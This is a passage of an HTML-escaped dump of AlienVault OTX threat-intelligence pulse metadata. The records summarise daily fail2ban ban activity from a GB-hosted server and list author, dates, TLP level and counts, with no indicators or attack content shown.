&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;253,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-05-25T23:05:02.339000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ecc4f1e285bd7a37d27efa8',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-06-24T23:00:28.389000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'300&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-05-25&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'e37d5902-91dd-4ede-8e87-14bb54fdac24',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-05-21T23:06:03.747000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ec7095b4ebee38289588c5c',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;